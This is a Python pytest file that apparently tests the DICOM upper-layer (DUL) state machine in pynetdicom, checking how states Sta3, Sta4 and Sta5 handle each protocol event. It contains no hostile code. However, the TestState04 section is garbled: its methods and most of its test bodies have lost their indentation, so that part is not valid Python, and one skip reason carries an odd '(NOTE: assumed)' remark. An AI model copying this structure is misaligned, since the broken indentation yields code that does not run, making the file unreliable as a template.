        self.wait_on_state(assoc.dul.state_machine, "Sta3")

    def test_evt01(self):
        """Test Sta3 + Evt1."""
        # Sta3 + Evt1 -> <ignore> -> Sta3
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            pass

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt1"]

    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta3 + Evt2."""
        # Sta3 + Evt2 -> <ignore> -> Sta3
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass

    def test_evt03(self):
        """Test Sta3 + Evt3."""
        # Sta3 + Evt3 -> AA-8 -> Sta13
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("send", a_associate_ac),
            ("recv", None),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            pass

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()
        # Check A-ABORT-RQ sent (source 2 = DUL provider, no diagnostic)
        pdu = A_ABORT_RQ()
        pdu.decode(scp.received[0])
        assert pdu.source == 2
        assert pdu.reason_diagnostic == 0
        # Check local got A-P-ABORT
        assert assoc.acse.is_aborted("a-p-abort")
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt3", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt3"]

    def test_evt04(self):
        """Test Sta3 + Evt4."""
        # Sta3 + Evt4 -> AA-8 -> Sta13
        # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("send", a_associate_rq), ("send", a_associate_rj), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            pass

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt4", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt4"]

    @pytest.mark.skip()
    def test_evt05(self):
        """Test Sta3 + Evt5."""
        # Sta3 + Evt5 -> <ignore> -> Sta3
        # Evt5: Receive TRANSPORT_INDICATION from <transport service>
        pass

    def test_evt06(self):
        """Test Sta3 + Evt6."""
        # Sta3 + Evt6 -> AA-8 -> Sta13
        # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("send", a_associate_rq), ("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            pass

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt6", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt6"]

    def test_evt07(self):
        """Test Sta3 + Evt7."""
        # Sta3 + Evt7 -> AE-7 -> Sta6
        # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
        # AE-7: Send A-ASSOCIATE-AC PDU
        # No override here: the normal negotiation accepts the request
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:3] == ["Sta2", "Sta3", "Sta6"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt7"]

    def test_evt08(self):
        """Test Sta3 + Evt8."""
        # Sta3 + Evt8 -> AE-8 -> Sta13
        # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
        # AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Replace negotiation entirely: queue a reject primitive instead
            assoc.dul.send_pdu(self.get_associate("reject"))

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt8", "AE-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt8"]

    def test_evt09(self):
        """Test Sta3 + Evt9."""
        # Sta3 + Evt9 -> <ignore> -> Sta3
        # Evt9: Receive P-DATA primitive from <local user>
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Replace negotiation entirely: queue a P-DATA primitive instead
            assoc.dul.send_pdu(self.get_pdata())

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt9"]

    def test_evt10(self):
        """Test Sta3 + Evt10."""
        # Sta3 + Evt10 -> AA-8 -> Sta13
        # Evt10: Receive P-DATA-TF PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("send", a_associate_rq), ("send", p_data_tf), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            scp.step()
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt10", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt10"]

    def test_evt11(self):
        """Test Sta3 + Evt11."""
        # Sta3 + Evt11 -> <ignore> -> Sta3
        # Evt11: Receive A-RELEASE (rq) primitive from <local user>
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Replace negotiation entirely: queue a release primitive instead
            assoc.dul.send_pdu(self.get_release(False))

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt11"]

    def test_evt12(self):
        """Test Sta3 + Evt12."""
        # Sta3 + Evt12 -> AA-8 -> Sta13
        # Evt12: Receive A-RELEASE-RQ PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("send", a_associate_rq), ("send", a_release_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            scp.step()
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt12", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt12"]

    def test_evt13(self):
        """Test Sta3 + Evt13."""
        # Sta3 + Evt13 -> AA-8 -> Sta13
        # Evt13: Receive A-RELEASE-RP PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [("send", a_associate_rq), ("send", a_release_rp), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            scp.step()
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt13", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt13"]

    def test_evt14(self):
        """Test Sta3 + Evt14."""
        # Sta3 + Evt14 -> <ignore> -> Sta3
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Replace negotiation entirely: queue a release primitive instead
            assoc.dul.send_pdu(self.get_release(True))

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt14"]

    def test_evt15(self):
        """Test Sta3 + Evt15."""
        # Sta3 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU, start ARTIM
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Replace negotiation entirely: queue an abort primitive instead
            assoc.dul.send_pdu(self.get_abort())

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt15", "AA-1"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt15"]

    def test_evt16(self):
        """Test Sta3 + Evt16."""
        # Sta3 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
        commands = [("send", a_associate_rq), ("send", a_abort), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            scp.step()
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt16", "AA-3"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt16"]

    def test_evt17(self):
        """Test Sta3 + Evt17."""
        # Sta3 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        time.sleep(0.5)  # give the DUL time to notice the closed transport
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt17", "AA-4"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt17"]

    def test_evt18(self):
        """Test Sta3 + Evt18."""
        # Sta3 + Evt18 -> <ignore> -> Sta3
        # Evt18: ARTIM timer expired from <local service>
        commands = [("send", a_associate_rq), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            assoc.dul.artim_timer.timeout = 0.05
            assoc.dul.artim_timer.start()
            time.sleep(0.5)
            scp.step()
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:2] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt18"]

    def test_evt19(self):
        """Test Sta3 + Evt19."""
        # Sta3 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        # 0x08 is not a valid PDU type
        commands = [
            ("send", a_associate_rq),
            ("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        orig = assoc.acse._negotiate_as_acceptor

        def _neg_as_acc():
            """Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
            # Keep the state machine in Sta3 for 0.5 s
            scp.step()
            time.sleep(0.5)
            orig()

        assoc.acse._negotiate_as_acceptor = _neg_as_acc
        self.move_to_state(assoc, scp)
        scp.step()
        scp.shutdown()
        assert fsm._transitions[:2] == ["Sta2", "Sta3"]
        assert fsm._changes[:3] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt19", "AA-8"),
        ]
        assert fsm._events[:3] == ["Evt5", "Evt6", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def move_to_state(self, assoc, scp):
    """Start the association and wait for the FSM to reach Sta4.

    The requestor's transport ``connect`` is patched so that opening the
    TCP connection queues no FSM event, parking the state machine in
    Sta4 (awaiting TRANSPORT_OPEN).
    """

    def connect(address):
        """Override the socket's connect so no event gets added."""
        if assoc.dul.socket.socket is None:
            assoc.dul.socket.socket = assoc.dul.socket._create_socket()
        try:
            assoc.dul.socket.socket.connect(address)
            assoc.dul.socket._is_connected = True
        except (socket.error, socket.timeout):
            # Connection failed: close quietly, no exception details needed
            assoc.dul.socket.close()

    assoc.dul.socket.connect = connect
    assoc.start()
    self.wait_on_state(assoc.dul.state_machine, "Sta4")
def test_evt01(self):
    """Test Sta4 + Evt1."""
    # Sta4 + Evt1 -> <ignore> -> Sta4
    # Evt1: A-ASSOCIATE (rq) primitive from <local user>
    commands = [("exit", None)]
    self.scp = scp = self.start_server(commands)
    self.move_to_state(self.assoc, scp)
    # Queue a second request primitive while parked in Sta4
    self.assoc.dul.send_pdu(self.get_associate("request"))
    scp.step()
    scp.shutdown()
    # Only the initial Sta1 -> Sta4 move; the second Evt1 is ignored
    assert self.fsm._transitions[:1] == ["Sta4"]
    assert self.fsm._changes[:1] == [
        ("Sta1", "Evt1", "AE-1"),
    ]
    assert self.fsm._events[:2] == ["Evt1", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
    """Test Sta4 + Evt2."""
    # Sta4 + Evt2 -> <ignore> -> Sta4
    # Evt2: Receive TRANSPORT_OPEN from <transport service>
    # Skipped: no direct way to inject Evt2 in isolation (NOTE: assumed).
    pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt3"]
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt6"]
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt7"]
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt8"]
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt9"]
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [("send", p_data_tf), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt10"]
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt11"]
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [("send", a_release_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt12"]
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [("send", a_release_rp), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt13"]
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt14"]
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt15"]
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt16"]
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt17"]
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt18"]
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00\x00\x00"), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState05(TestStateBase):
    """Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU.

    Each test drives the requestor's state machine into Sta5 (request sent,
    waiting for the acceptor's response), fires one event, and checks the
    recorded transitions/actions.  Unexpected PDUs in Sta5 trigger AA-8
    (send A-ABORT, go to Sta13); local primitives other than abort are
    ignored.
    """
    def move_to_state(self, assoc, scp):
        """Start *assoc* and wait until its FSM reaches Sta5.

        One ``scp.step()`` lets the mock acceptor receive the
        A-ASSOCIATE-RQ without replying, leaving the requestor in Sta5.
        """
        assoc.start()
        scp.step()
        self.wait_on_state(assoc.dul.state_machine, "Sta5")
    def test_evt01(self):
        """Test Sta5 + Evt1."""
        # Sta5 + Evt1 -> <ignore> -> Sta5
        # Evt1: A-ASSOCIATE (rq) primitive from <local user>
        commands = [("recv", None), ("exit", None)]  # recv a-associate-rq
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        self.assoc.dul.send_pdu(self.get_associate("request"))
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:2] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
        ]
        assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
        assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt1"]
    @pytest.mark.skip()
    def test_evt02(self):
        """Test Sta5 + Evt2."""
        # Sta5 + Evt2 -> <ignore> -> Sta5
        # Evt2: Receive TRANSPORT_OPEN from <transport service>
        pass
    def test_evt03(self):
        """Test Sta5 + Evt3."""
        # Sta5 + Evt3 -> AE-3 -> Sta6
        # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
        # AE-3: Issue A-ASSOCIATE (ac) primitive
        commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
        self.scp = scp = self.start_server(commands)
        self.move_to_state(self.assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()
        assert self.fsm._changes[:3] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
